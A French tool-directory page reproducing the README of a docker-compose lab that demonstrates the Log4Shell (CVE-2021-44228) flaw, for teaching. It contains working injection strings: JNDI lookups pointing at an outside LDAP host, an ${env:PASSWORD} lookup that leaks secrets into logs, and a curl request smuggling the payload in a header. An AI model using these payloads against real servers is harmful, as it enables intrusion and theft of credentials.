Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j-cve-2021-44228-sample — Exemple de configuration docker-compose pour montrer comment cet exploit fonctionne | Kitploit
Outils/GitHubGitHub/alpacamybags118/log4j-cve-2021-44228-sample
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubalpacamybags118/log4j-cve-2021-44228-sample

log4j-cve-2021-44228-sample

Exemple de configuration docker-compose pour montrer comment cet exploit fonctionne

Voir le dépôt
2il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exemple d'exploitation de log4j

Ce dépôt contient un exemple fonctionnel d'abus de la récente faille log4j. Il n'exécute pas réellement de code à distance, mais montre à quel point il est facile pour un acteur malveillant de faire appel à son propre serveur ldap depuis une application vulnérable.

Ceci utilise l'excellente application vulnérable de log4j créée par christophetd : https://github.com/christophetd/log4shell-vulnerable-app

Explication

Cette vulnérabilité abuse de la fonctionnalité lookup de log4j, notamment jndi, qui permet à log4j d'effectuer des recherches (lookups) sur des hôtes externes pour obtenir des données à insérer. Cela peut être exploité pour aller de la journalisation de variables sensibles de l'environnement jusqu'à l'exécution de code à distance.

Les recherches sont effectuées pour tout texte entouré de ${} lorsque le logger est appelé. Par exemple,

root@kitploit:~
${jndi:ldap://someldapserver:1389/o=example}

effectuerait une recherche sur ce serveur LDAP avec la requête donnée et afficherait le résultat.

Un exemple plus simple qui n'utilise pas jndi, mais qui est tout aussi dangereux :

root@kitploit:~
${env:PASSWORD}

Cela afficherait le contenu de cette variable d'environnement dans les journaux. Une personne ayant accès à ces journaux pourrait alors extraire des données sensibles de l'application.

Code de log4j

Le code log4j nécessaire pour que cette faille soit exploitée est assez simple. Il suffit d'appeler le logger pour journaliser une propriété de requête donnée sans l'assainir. Par exemple, vous pouvez journaliser le contenu d'un User-Agent.

root@kitploit:~
...
@GetMapping("/bad")
	public void Bad(@RequestHeader("User-Agent") String userAgent) {
    logger.info("Received User-Agent header " + userAgent);
	}

Utilisation de cet exemple

Tout d'abord, construisez le serveur ldap local :

root@kitploit:~
docker build -t ldapnode .

Une fois construit, démarrez toute la pile en exécutant

root@kitploit:~
docker-compose up

Ensuite, vous pouvez effectuer une requête vers l'application, en utilisant l'en-tête x-api-version pour injecter la recherche

root@kitploit:~
curl --request GET \
  --url http://localhost:8080/ \
  --header 'x-api-version: ${jndi:ldap://bad:1389/o=example}'

En utilisant cette requête, vous verrez dans les journaux de docker-compose que le serveur ldap a été appelé :

root@kitploit:~
bad_1    | ldap server has been called!
log4j_1  | 2021-12-14 02:43:11.657  INFO 1 --- [nio-8080-exec-2] HelloWorld                               : Received a request for API version com.sun.jndi.ldap.LdapCtx@201a609c

Que faire si vous êtes concerné

Veuillez consulter cette documentation pour connaître les solutions de remédiation.

Télécharger l’outil